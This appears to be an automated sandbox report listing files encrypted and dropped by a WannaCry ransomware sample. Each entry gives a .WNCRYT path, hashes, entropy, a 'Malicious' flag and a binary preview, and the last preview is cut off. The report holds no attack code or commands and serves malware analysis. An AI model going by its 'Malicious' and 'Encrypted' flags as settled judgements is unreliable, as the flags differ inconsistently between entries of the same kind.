C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{C5106F55-DE69-4257-BD69-461E3E514242}mt16400656.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7032
Entropy (8bit):	7.974071607132033
Encrypted:	false
SSDEEP:	192:oGUDoYb+zKNTy6y4pNxMf+OB4ErOIEOs4+199/9wZ:ZUDo6nNThdpK+ZE24K/8
MD5:	1250BBCC5A7A2E72E40EE60BC09AAF38
SHA1:	1D62B4E46E229C94624CC3D0C059CB8EA15F9FFA
SHA-256:	3660D2E40B85FC6458E806A08EEF2E7D54698CC8798138AB1EC74B5DB2A9448A
SHA-512:	394ACDA337E13DEDC0A15AD4C95967F945DA656B8540E14372214FB67D1A34502A24E9EBBBB52E6E64F4813C33F5CA5D62C38B29E2997F2A2198E68717C32025
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....D..QQ.P..,..>..5DO.h\...V..nv.`v.{.b.....W..?..w%..)h..i.@A..,`V..B. .o]...0u">...'...~J..`..Xx!..S..7/.F<.._rL.. ...$...V{].....?.<...qfE..xO....j.S.x.H....p......kZ....6....D...#.[V2.2....X.N..i .x.8B}.o........3.t1..8..U'=7..z8U...FH..j.v....T.......!..`.U..\|X."Iv.w.8..Sk.`..r.x.....6.f.[."....(.....f.F..e.].l..T.^...yKv._Ma.$L.<..c..,..i..F8....Q.u..E.y<0......d..bF.A...j..0.......AP.v.kRC.....d.<...Nt0D..).h.'S..;..P..yw..O..)BGcm...?...r.xo...6.>...A.........Q..j.j.:..!j.g...j`....Uh..h.[..)...^.&...4.#.hw..0...K.\|Q....vE..O."...Nx*.dm.......A....(.q.i.......A....._l)#...p.....!......N(5...F5...M._...q5.g.p]......X.6<..q..d..#.....(.........X...Q.C.........!.i.\|...QG......y....k.<......S^...\|.f":...RO../.....4o...V..7C7bT.{.DM.....DE...".a..G..~.Z..K.....U.y..c..3..rl.\;.F=zN...".I.....F..[.(N...:.&.^..'.F.OYr...'o."..]F.... ..%.;- Z....W/.K..7.P.o.....al.K.9."...t..J....;.t..K#_...n....N.f.H.v..>....i8...7.1.7&.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{EBE7A16E-2C11-4DC5-89A4-976E33A0596A}mt45299826.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	8792
Entropy (8bit):	7.981122854042096
Encrypted:	false
SSDEEP:	192:dckD2feCeiz/CXW9LTG0H8y3LILFAXDdNwcUM6lxNodne+m57gCDYte:akD2fD6XW9LTGg8y3ELChntCNL+mpgK
MD5:	6DF5B90782F136D3680D7274907871B1
SHA1:	DDB770C980D039FF188DA9B65C8EA2EEBE8A26F8
SHA-256:	53D539D03B8932B75BC2D4BBED94B820AE2A9A0E479FBFD83AA6C442060AD4B4
SHA-512:	648C2C4D4197DBCD22CE9A57FE4DB7D2B1F5B7B1D96BE068787DD86C60C0F3D027BFDCE7B892E2BE704613798CABD98C087A792E816A6F7E4E0DD5274B486AD7
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........9...7.(0./..(.>.......e...1[......Ek..!.....O.........5.!>.+A....V..\......S...............~.8.3f\|...aZ^...!.....T....?(.lE.a.o.E^..F...s.2..G.....[..-L3C.J.8..A......Q..fL.L.c.C.....'.b.<Uryz?4.5...z...6If.%.n".w%.6#y....[..K.y[..1xp"....2!......Ch...L=.b..~.d.#$.&....+ts!b......_._\..G..\|`.Oe.fY\|..y.w../0.F.L...d2.O....2..^0N.eM.....c......py......Nsd.I.......u.,..m$.>....R._.x3H_u....U.+.U..]W..C$...8l.H.....qb..y)...&..i.T.o..(....5M):......>o.....1......^..AF.....@......F....,.7.....E...J..6......ve..;.}..m.EZ.l3{...D....:.....UD.7c.S:...<.<Uj.}..3.@^"..xn_.k...P..../w.`k.m...A#.....M`......K..IiP;> p....;...v9.QC.3..y.d.1...(............#...r.y..6(...k.....XId.."..........6&..\|.o..Q0Xy...x.5....<iw.Z......., Y7G....u.R`. .....@.).]V#..........e.I.u....q@.....:.<%...%.Bdx$\|....=.7.B......hk.....g...(..S......3...r1..:/..Z*5..RILi......<v.....Gv..R).}.R.B.4.}.!.]Gf.s.5@r.......}.'..&...0.-..`_$...fbY.....5.Y

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24856
Entropy (8bit):	7.992138270771964
Encrypted:	true
SSDEEP:	768:owBWGI38elwRYr3w7+BaFzG8ZGyJtrs6fUE+:owQG+8uwCcyaFzjnLoUh+
MD5:	07DA23EC496B884C41B4CDC535EDF7F7
SHA1:	67CA65A74F58B8115D4C5D7726E26BA44EE17C7C
SHA-256:	123E2B204C6D2359AD76557B5B445325AF9217ABEFF9CC54C7CE979A0CC1290E
SHA-512:	0AA1E40F6A3436AB385CFE42AA8F34B06AE3282DD3BF9C64E066A8BBD84777A6BA5155685C57ADFF254B492A43C53B0D5C822EBC03A5E2D04FCF8789589A87DF
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....n5u...D...u....\|..1....$..T.2P.T..XW.A...u3.....Ld....<-.;....3.]y.z....A[...x...t...' ..\.bv..e..u..$..-. ...W.7.FxU.o;@....v. \|...."..J....y..u.>H...j.L.....;.P/.O?....P.H.._.`....,.......,8fY.........]....\..r:C.X......K.)S..f.sZ8%..._.......`...........D.....y..c..sZ...+4.>o.V......V..6..h....(.-~>..c..s.-3..D...6{.X..r.5.4.}...'.8..........4a5..4....Fg...\.j....8....XkK.!go.>Ed...C.. o.N+..-./....6.o.....6.bT.....E$..y..-n.uI..Jj...$?.}....FLj@ :...Z6..%,..A...$.c/y.}_p..8..n.FQt.Hw..0$..O...S.h.'.._..{CW..0.....l.i....(....4.ym..l}{!.i......e.....'....XH{...f.....K:....7.wR..ru.T.n8.&0O....<9..].^tp..{...-.g..0B+V....5d..$d6.H.x..H...^oqA'..B9z.5.....m.....K..:...6.S....U...\bm....s..8-.r.yF..z.iS..KR.=#...!^.a.X..%...E..M!...B......h5...I7.1...X..."..]...zH.......Ojdo..Z....Q.]~. me....."s.0.aa......A.z.<(.Z..}~.......g..9..y-..<....y......CF..^K>.X.t_~....E.4.."........[....K{`.]...?+.c...F./%..l}.W..>f....Jd..

C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24856
Entropy (8bit):	7.992265913437515
Encrypted:	true
SSDEEP:	384:YI/4yW/puPmfLNXY1W3GlwoirHLQkaKCdqqIxEo2y9mIAy48+oLkykuEoH:YIhmp4mJoRjirQBUqIxEo287Z3LVREoH
MD5:	8351016CAE22C79D3C872BBA52360B22
SHA1:	417FC500C5165447DE5E6B8E1F200DAD89391BE2
SHA-256:	6163DCACC6E848AA48555732A152D8C0BBF5BABD86349802C62C5D700B5E5C48
SHA-512:	EB7855A7FED374BA8B4FD04BCEAA757659E8E2CE00A702B575BE23EEDBBEF51707718CF1D8A3181DE73D68014E445EDCCAC2850FDBFA9E1ADB39170BF0E3BB55
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....&.U..^^}.-..hR..Q...p..LaB.g@"7.c.oH...`.A.H..!.n~`........o.pp.uoH6.X.........PDAp ..0t..&....;...,.n...{... ...Q..../.w..X....X.$.......~.k._.X...n..Y.O.....`.o..VC.w..e.$..Or5..\|./:..c..........^.....C......"....H.....^...i.....9u{..u.~M_^..P.j.....`......j....'.\|.q.~.......i.SU.7m....x......Ri...YG/...O7u$n7..P....Z..'.{.SmFg....~#.}..u.,.!l].F......x.oG[....A.y.. "h.......qO.I.R...H./...........e+.=pcK...&.]........S.7ue.......\|jA0<....6..f....2h.H...\|..H.x....k....a#w..=Z.g\|nI'.?..K!..F_uQ.."....L...+...#T.X.B..".M.....i..x...A....@0.c ....<...{..2k.....F.@..G.....]K.{...0...1..O._.E.......h....FE.`......L2.9_.B}.@..6J..9{.g.H.....A.k..5...;...n.......h.........j&.5.C...o..\.w.., ...{1r..^..@.<..X;..?'....d.....X...V...*w\c..;.A..d.B...3...xQ..../.....9.......S....v9-...)......G...........B.N....6.=./..n4X.].......V...O".KJ.4g...m.K...\........s...J...Y.c.I.qC-.[......B"Y.C...L.'2}.=..3.'.L3S..A.....VR

C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24856
Entropy (8bit):	7.992285342276284
Encrypted:	true
SSDEEP:	384:ihg+u8OCyjIWAMkRNB9vbcPT4quPQ0seRWcU90BTPwMzRra+Iv2JOKtEsyo:ihm2nLvq4LPCSxz1mvYZIo
MD5:	ACCC334BE6437A36BE9106DED30993BF
SHA1:	7EAABEACFB920D3FF886B7D3BD37F25C86EBD7DA
SHA-256:	7A272133F3DE87F0F11DBA1141F4EF051F2E0C293035F12911CF10797B03D723
SHA-512:	316927F1F1043BB947C949C9F48109C4CE7018113386C01CC5D544298D463532D9C8411B7959168379697DB6EA99BFE50E809F84156C6C53ABA8A5CBC68C9100
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....J`...5.I.......>.tK~<%I.h.P....CZ:#....?w..M.....I~W.P..l.I/%}.Z...[...9.h..z....p.].d.c@B.F....\...jL:.l..(.>...@..Y.!.7Ct.......Nt.#;.x...w..H.r.a..-f.a.()!....w.c8.....X.C..(".Q9..+.D........r.ua.?.R.J..e..CL.@..9)N.TL.......i......`.......+..1.o.+..eU.RS.........U.[]..U..#...zC.]...."@..kL..+....-.t.GA.a.6...V......K.}.[`...=S.T..#.......~.....?~R.%.V.w1.4...#L).l..7&Is0..B.....d..M.@h.@.ia...~... ..B....D([.L"...Y~..r.&.........U.....-A..^.G. w~....."s........2.q^..^.O..S.......\..^u\...Wh.B?...kA.Fi3.N.C..t....._.c.{.f...:...Z:..P.V.4...}.%....{#...2.6..m.K.]$7...&@.))....n..e.q.K...A...._..S.........$.Y;[{.......!fA.dy...?#.mM... Y@$..m.R./..=.....d^..v..Hr...M...0..K.P.ky.%lt...`.6.\x/....`P..O./G.>xbTV.]."..%.aE[........TZf#.&..v...a5..b.G...y....wrZ....P.d-Fq..Cp._.G..?.......2.../.c`.l.=..E.3..p.O._VOk....h..YS..q..^...bDJ\ ;...'#..LqL..2E..;.....f4.W8.T..ad.....1.......0..Jq..GtY...e...9-.

C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4376
Entropy (8bit):	7.960441735490359
Encrypted:	false
SSDEEP:	96:o3AvAI1j7kwxnanWVXr1VLWyCTSzWkqKK9EooG3CM:Goj7kwYnWJDLzOKKiov3CM
MD5:	D8700F98984DB40B41D3A02B5DCA8FB7
SHA1:	D9703A9EEB5E3F5D47B62F97E979AA5808836249
SHA-256:	84E919283093E038A82E48CE48811E06594E8CAABC0AA15F2CEBD5B402A29CDF
SHA-512:	998587BBA4D052D47CAE658DF08424B072ADEABC759DB0901B509A6E6ED69DC8659A0E20D5CF3417B5A9A0F5FB0495D2763F5C6D4BC75ED2E4EF19AA23B7D4E9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........O..Y...}....F.$\|.(.z~......K.)..,..h..)....&....kxR.hsR.8.7 ..N.... . .I.u..:..IQ.O..P....Z...\|.8.'.l...........5=.b.%...q....~.. ...DKO.gG.<..8...b...w$T.+D.N...G.p ..9.......%`ZGarI2.....^K....h../q.v.z...3...t#..[z.s.......-.g.l.H..............0.).q4......`....Dzf.B.%.yF6..q.S.....-.6r..M..}P.i.$....:.....m...W.....U.MjY..&....)-..).CO......%`+.jY.<x.....B..7......`C'.~..FD...^..p#.4.[^......Rw0o.`.A.q...@.......x:3=P.%?....w.E:...'."x..t$."\|a1.@.lzV>.x....KzBz..t.rc." .-.i....Q".%?\B0$...\...O.J.B...P@....k.........-.7.s.P..#..#....<.rx..&.P\|6.#C.^...#.....T..x.of.\.L.xVA..f.V2...L...\...K.......C.^.D...E.....N7...!....]..5.{Q..B.....6}..S..].n..^.2..4!..O..$........8v....6..UT;x.n...J.....-..;......@.; .>].`.....u..w..C..>._..x...".}....&d...M.(<O...........0..o.M.=......X.t..pU...!.@.s.....kT..?G.....F.%....=...(.*...d8..H..v".>........f.K.=.<...B...a...9X.&.K.M.9.....'..m..Q.[A...iK....9.T..6.1...v8#Ug.X..[..M..

C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24856
Entropy (8bit):	7.992497834072748
Encrypted:	true
SSDEEP:	768:wk54PUJhrgWjivNXPQWcmdwJ/IRxplKkaOjABQ/Ybw:w04PUJhrg0mXdcPOlKkaOjIbw
MD5:	8B9D222D00D689EAB361BA5EC09AAC4C
SHA1:	0DA07B303B8DC754A0404A2513C710774AB49A9D
SHA-256:	A6BFA8AA07E1D27B5A496DFE561E00653832AC1026D1580B6903D4D1C3052B90
SHA-512:	FD33D11B37A2C5771DC74E6CFE7151FED7F4975AE03BF38CEDDDC5D577376B44AC43A9AD21BD9AEFA3878054E2765B84717AE08BF478CB31FCCB46BF443DC299
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....\|....0$.pY.gs....R...?..)..9.....WO....Uxr.!\|..lo..&F.:.6F....Z.../.nIR..i.'..n....J....XHl~.P...o.%.rp.eT.SI.B=..t.sgd{.j.Z.]........$3..@fU.....z.).a....!i....6SW/tt.1..u....M<svA#&Qx.....$..f)....e.S......K..r"..t!.}..>O..\|..K.jc.d..V.....x.\.,.....`......8.).....p.Z.(.e..q..r....^s...$.)A.Y.ke.s.. d.^........$.5+..o.0...S.....wef~.I.....J..&.d.}8...C}..f.......f....Uk.@S....G......_..;`...m.1.gg.4..]%(n..D.eH6......3...O.....Pw.2.....M..H.k.{4.j..~.#t...yR..(aEw.}..xuEp..w-Oj.TI...g?.;B...:f.q...A.U..E{x!....^iHm.>...0:.....T.4..-....%.(N.q_.2.iq......D.E.p;..{...vuX.........b`.6..yG..+....).K..Zj...Q5y.1]Y....A.V.j...O`.)..R..\c...q.xiN.1.x....L..C.c.tA.<].\f..y...d.Y0.9....dp..%.d}..z.53....=!....J..... njb.a...ST.d..h'c.p.Dz.nF0J.J$.D$.^z..t=.fhG..\G.....*J.........P..s%.o....6..tTW?O.........{....#..W.89(<.;..y............w...)..v....g...#.f.Ej.d..N.>Z...........`Ha...9..F...%.7.S...K`TB.+8...+&!...6Z.ZJ..a......V..5.X.<c..

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\microsoft-windows-photos_8wekyb3d8bbwe-app_339_0.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	55544
Entropy (8bit):	7.996622148989055
Encrypted:	true
SSDEEP:	1536:W4XEnJnxgng8YVwDDQNnvICqhAjKedVYJMOcnpQY:WGEFRVwDDkvI/gK8YJBcpQY
MD5:	3F66BF49DB4863B1C2829AB774842FE4
SHA1:	EFA133B6B6D0D72DB51A0DC4ECCA82C8D7E65C98
SHA-256:	6FB8DAF0CB9917C4D046A768248678863F510094352383EDEB2F2D57FCBA58E2
SHA-512:	EFD8F231C937832F58F16AA7E9F9FCCEC771860F7963A2BD537BEC8D7B9DC2CC1F1CD7C2EFE2606D0360BFAB2C32953E24860806BB0768BC8204ABD73CF18D7A
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........ ..'.......q\.X...Z..Q.6]1....R..fg>.c.........&.P6..R."=.2%..~>/.Y..5.....R(..m+........H..2.q.&ay..>..'.....L.g'...z..gT Jg.r...[...r5.0.....O;4....)..........g..H.........ty...&U.%...).g4./.."=.W...8...NA...:?.d......;M................m..v.*..H.....d2.G..B.t..Y.f......1...a....]SdCY\5..I..&..$I...espPx.&J...]pq...JhT.I=T{..I&B.\|......O_.;!....f..?e...........#>.H.D..H....9..zJfk...@J...M$...S...2......d.d...S............d.q.c.....\|j...3...L=f.R&U.....+..C..N."%..K"7..0c.N..LSW...M.\#..=.Am...f.....7..........H.,.F...J.......s.D.&.-.l..v.".Y.YK.........I.s...\|..q...sF.L........\|[.H/8..t+...kU.....J...y0p.$28,\Ui.....fPK.r.."..u...&.... . O...4......C...q...Z....f..RW.[Qn..~J./T:,...V..l.b....l..2....W..i'.s.zJkM...[WJ.Z.j.\|Y.gK....'g...}..7TY...T.X.:..&.02...L.GH...O....x.j._H._..A..p1.....-^..........Lq..........CWS..13.g&_..bV...(I....e..(.m\.d..F..gf..x'.%y}..^.sK<.#...J......#.p..Zt.4..'.b..R.

C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_337_0.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7160
Entropy (8bit):	7.973858493180027
Encrypted:	false
SSDEEP:	192:AZr/OhPcSvshEKqpc7j89eSuOW1wwWeV54kWsLJjY:A1/OhvCKsmgUSV54kWaJ0
MD5:	406A28E20A610F15E4C5B7E36D10308A
SHA1:	0C2A59688A6EAAC1274011E7437D5131C942D73E
SHA-256:	CEBC81530904055D33D2AE69EF76BF8E8852D1AA5E9BEF27C5BB866CF740682E
SHA-512:	7972B8B70A8784F5C0AD308313AB9AACA73579413D9805DCCD57AE75E46D16690C72F6D24D85987D9935505F837AB0DED63ADB90F3E43B099DC7734798FD0931
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....g.z..=..m...\g04.....ml.5.[.C.......w..4.\|w 1.dd.r..?{..=,]....z.....\Kh.\(..~. .!...s...N...YO..J.,."....-'X..vf.i4..c!...\|..a......r....X.z.t..R.}}..Gr.$C2..^.\|.h...q.E..C.........W.S..e.#/...9../S+n..Z.v...T...... .L..l.C{...13/{.................`..g.9.1..0>r.i.=Q...,...a.Z(.........$m.,..J.Z.z.j.s.........B....h.^H..`.W..0....l$.QG..mW..W.......;..q..........1...c..E...K.KG;..X.........M`...4..m...9... ..!..&L./Ol...h.....F6.m].@...A......>.55....n....X.E//..p..?.1...{.v...Z.....%..........o/...f....t....b.:(i.@..H..2#." sY.sq......?~z+...CtF:.......J:.....1.g..]&.C..I=.:..Z.....+,.7Ux....1'~.2!.8...F....?...<...2.=.G0.'..a.......Y...'[.......+......,.......P]....Zt..J......>.J.2...KY..L..fjCJ...#.8....f..'.s. a..Tc..'Nq...].liJ..3..f..N.B.p.....l......+.y.&s..y...3......8..;.jy......K....u.\|..\...[u.~.YT.#........."u5........ty.;...8Vf_D?.......7._...F.8bX....:....f.=..i.[./~N$..7QQ..v....9e..OB.....(.)U.#..RK.#

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	16664
Entropy (8bit):	7.986858675875987
Encrypted:	false
SSDEEP:	384:u6vJDcXHo6a30LuuFLhOEhaf3Bmbdoe2tsuhcd4n/tqY:u6SHta0LBFsEhe3B726nVqY
MD5:	EA811F533F3A42AC4908F07EAA4B6002
SHA1:	C0FE066B1CA921F72246C08AE754AFC8C5067D1E
SHA-256:	67F536AE7B2B9CA48E47829F202FF8B0864CF9CAD0556AC141ADC9F6004DE8C7
SHA-512:	DA5BA4C83113282492303A48C26BCC1AAD0513771CAB52B4FFCA3DA41D4FB50D2EFDFB17D0A720D0A6E614CF088AFC26FF9265AB476F2C6B354E2D024E0D1A19
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!............A.&....9...%~.<.D).#Hm5...\...].....Eod1...>..S..AR.AOI.B.G...g...,]NKd/tq..H.4..CS...k.a.sZ...E4...tC..........O...:w..........a..`..x%X.m.}...YV.[.I..r.,N87.......?.(A......AE.C5G....\|.=e.T.-...f.......Bxt..c....w9r8.# .. .!..l.Hd.I.....@......)H.9d......\|..<......i....T=i.....r^../.j..4_....N.s.!.e#.b..m.:.........oZ...D.....&.T.g.V.}D...i..dcs..U.K..)...*l...].u.]..(.....4..s...Ul..j...?.f6rj......A/B...v.y..wgg8.t3].s,..).EW.XC.O..8>.+?.8.6n...w.........z..x.P.F.......\|...m...2_Z...&..T..P...(..5?.f....._.B..Iu}z.w..A`u&..'..@.c)..I...."g.-.8..r.lH`..ABh...~`.{S_lO..."...N.M..+..../j...ex.".t..@...\|.......E$.......gq..,....".@<...~...H...r...Zo..0.CEd.....t.K.Z3..W..Y.V?g0^...bA...H$..!aY..":.c...I......W.=.d.W.8u.......w..\r...W.l~....dD6K.E.z..r.e.....el..3...s.f"Sv...'........8?__.#....+.)".".(..`rM...."......S.....w3.......ae..:.24..z.z..z.......2....g..t...>.<...+.[j..B..l..~..K.....D...Xa..a.....xr.

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	16664
Entropy (8bit):	7.987997972404592
Encrypted:	false
SSDEEP:	384:tjlN2cZuucdwcYr16YwjfcHq3eUCtWq3loJpNZ2ddbH:hlUcZuuIwcYlufcHq7YpVob2dd
MD5:	E5A370AFD99C692C9FE65BE76848193F
SHA1:	A613100E6B0A2665A763DC23EB281618FD95A870
SHA-256:	C299A0617FD339C7F8F87D95F4024E6FAA780E48E3B2C8C1BE89DCCC5F047CEC
SHA-512:	0F11360BD28658F09108102FCA3D6A045E754639CABF0227CB74E4E6E9563C9AF61CE62A0DC0E4E467F287279BC7727FE5DDF06B8B02BDA96B566B70DB0390D8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....h....L.s:.....<..3f....1.t...>...._b7(..7.e+...,=gwd...`r.R3E-f.\|Q0.Z..\|.../#.. P..T.9..g....\|D..Lx....P.~.Wj.#...].Y ..]..A.v(?..R*w.!Z..Z...:..f%..jK.1...ozh.J.5....T.e.R..(.6..[..=..\|..)...d3.....^v..W@Nm...U..{\|H.3.p&N.Z^.h4g'...B...)@......@.......H..R...H1....)..aF3dJ'b.;.EM8.a.....sX7F.V..^.<.G..<."5s..g.k&......?#.W.....m<)......~lC-..ai.j.....P..\..9y\|..3..t...4.J..0y....I.O.n.'.9..7......V._.....+..>-......wLZ8.w...I........3.Qwk....x..._3P.,..-.W..7....z...,.3.pH.kf[.3....{K.[.-:...5.......7..+.&....?...^..=.H(.^.i.-..........P-.Qr....y#../\|.c.6@,0IU.'#.n.........-..&-.....M.R.....Ky.9'....c.Xvu.Q..[z4.>+...&.Y]<g{....{~.@.../;jT....6...../.S......x.>.U~....Z.+1.V....:..x...W..#.(.fib.....<tC.a....I.G..a...kS..x..6G.g..i.{?...g../....:u.t.@..%..`.).4:.FX..G.6.J......s...S+P..#..].Vu....-N...QD$..q.......~..c.....T.o.F.[...A..[K.....I.S.z..h........w....JS....;..x.g.hc...ixR@....fi.V..O.z.{g8..3..,...j.i..".T...w..;..w

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3075AAB0-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	424152
Entropy (8bit):	7.999584215802004
Encrypted:	true
SSDEEP:	12288:eFQg96uHDWO5JKfdUtSdeJix6LZPis/emmO2Ul:eeefjqdaPPtWmJl
MD5:	BFBE8C277F61C53849441F70CFA1142E
SHA1:	E88D74F4552298F0E7FF5F5E926D67B5F6F224E1
SHA-256:	3728D0540050A97AD97704208CED43117B5B734497AD4CDA5297A52503A25D78
SHA-512:	C63E3657D3B17B59FFF9A93868A47131C726808D621AE64FE2B3B0D0C98223516726696B25427F6EB3DC61007B0CC82AC59C3845BC97776BCB967884D1EF6356
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....'.........A....vx.%.v2.Tk..B.{..;....1lM..6.T=.M.!.^.R.e.q..>.k5f.V7.....}\.b,.4.....=K...."...5.q,.....)".2u.p.6:. ....da......~...M...N...\..IS..f r....\.Q..X....'..z)...c..<./.$~,......)........O..:...T...{...#q.5o..7<.LY..]....%...W?.;.....w.......,P..db...y...H.,._G.....bw.n.vIc.,qv.....h.X.>v+8...~.pE-.....r.E&.;w^.G_.i.\|.Tw_.a...\|.2=.cyZ.[.<4.1...B.....}.....:g.s...a....4...,..}...}.....r&._.@.Bi......m.GFq...RS.....n.....IK.A.("..........i?C.S..4D.Y...#..-.(.d.6..`.q..x.iT..T1y.........s.......=.O.I.3...l..c..............YQ.w6.=..m'.S~...>M..>i....7....C.\8@.4.......p.Kl.!v.1....=FD.Z....W.,(..-..=..<.........FE)~D..>...^...,..Ku..Ei..r..I...Z.N...O.j@<.7Qb#....H.MUf..7.+0.d..!K.!!....P.,....y.h.@u%...ok].b5..tOj.U.n...r.eL.......y...<....^O..P.-..K@....5...1.'.j.<=.Ke.....s.3~>\|...1..+@....!.P......._...u=.,..L6.`..V...v. P."..`..t.....C..H.K.n....N%x&q.w"T....5......r*.;..'.i..<R:+...EQ..>X{.._.....Z}..T.;....".Yp.E

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000034.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	98216
Entropy (8bit):	7.998202382196595
Encrypted:	true
SSDEEP:	1536:SDFzN/kuBfqLH0N3G8Ia9omHxAjeOf4GMRtKR5zftxiDquqF0H2sYupY5sJ:4VN/9ByLHEZZ9QN4GMRtKvtxhZU2sYuF
MD5:	0B459E175C2C2523B5D080CB265D56F9
SHA1:	BAB142A1CA905F54F32DF002F2FA19A9B916F180
SHA-256:	D0360ACF7379E752D475F5D09B1AE79DD4DAD7813BDCF99DF70F4D5BDBD1EB2E
SHA-512:	3A60B66B390781D315509C44ECB9568864B6EE75EE029D9F1A50220389C00D7848442C95D4BF52CE306490428F8498D8E0DD9C9D1E3385A94E075AFA8F55CC28
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....e.,,..)e..b..8...zG.w>..:W....Qy%.K;+.^.~...."...w.0.....v{9,.GB.c.....1....8.w.P/.z...i.R$.T@.l.Q.+0.......af...,..7....t..)c.R.Af.z<.!2.....n.C..D5a.uf..-JQi-.ZwoRK..Z...-6...%.........mY..P...LK.E.o.Z..:yJ.{.;...[Y..ya\|.WD.4.b0..R.k..5....).&.....~.........:V....U...... n.F...\|.m.Ee...1.=.kd...c..7....../,.\|..'m.Lb.G.....>,.#......nC#'}.....y..G.2..U.?..w.i...")(.B.7..2{P_x..<.m..@..l...G..{...r...g.x8.. .G......%..`.....k9....g........B2SvI..G.k..2..;.35..pb.....o.$`F..dM..N.....Fm;.p.e..~.hD....e...........a..`.X.......U...=.....d.c\n...V.A....Q....c.,(.2....+.$.......<u.....#n..:.F.J.....7\i.(.".E...W8....r....c.h..u+.C..j..1.n.........f...x..geL.......Hfo{.?.\..r8.+..D.B.... ...H.$.....~X.k..I.~M\...^...T..?..[I.....~.1.......y....V...=..F..Rv..+...#.J.;N.3.^..io-...~#).CL..pnImA.Q_....v.%...fC...3._.a.d..V...A...L.h+K%....^..O...+.....e...}.O.a}.[,7)/.a....w..>..bj.....j.$...........hX......I....2...6..F.(\..-...R.9..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000035.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	100936
Entropy (8bit):	7.998269010956854
Encrypted:	true
SSDEEP:	1536:Y5QNx25pCdMRn8MeB8ANfWN0ZxCiI34mrdaaKna4OdlTEObhqr4:Vn259R8TlrZLI34SU7a4OPTEOtqr4
MD5:	7080E81CFDD438CB0758D83F2A80539D
SHA1:	B50A41E8A38B0FFDAEBB9A2012607371673E8B0D
SHA-256:	3A2E72FD0426AB497B148E7B5547DFAB9A2AB9DA65264C591A123DF9F4992EDA
SHA-512:	86651E06CC0E59D4CCB3129C9AD0B97BC25A292CA9BDE660C1AF1F46F8C8725FEA0AAD9A5FDD0A45A8EA5837DCD241D0B2CDC83D0774F0A52B35F047FA3DD1B4
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....zX....$..........'.4..7..........HB\F..........^../....Pb.c.....\c.u.P.i......@<....y.... '.I...k..'..f.W.:.2..4.\6nt.E...f..U.$_....\n..,..Zz..j....rEQ..3..7"....H3\#.i_.w4.......w....Y......,d.'...(.........5w..IM..aB.a.F..v./.........(.......1v..e.....&?.w.m.....a.3DR..).?A$..\|...qU....3M.+.;.K.8.k.$q-....+(.0../....@..MHG.Z....).~.;...W....'..]z..N..=./).W{..xX0.F.....mZ...=..._KL7.Y..{)v.....!.:-...J.s.....JlS.T(....f....j.ro.q...d..`}k...,K..i..'RH..v.]..[..h.r..5N......0c.N.....i....5..............=h..a}Tk...(.@d.."...O.E.....(.../..l.s....E{VN...>b..T..n.h.".[.h.e1....by...oQ...=w.'Y1c.pCd.....\@......O........H..co% 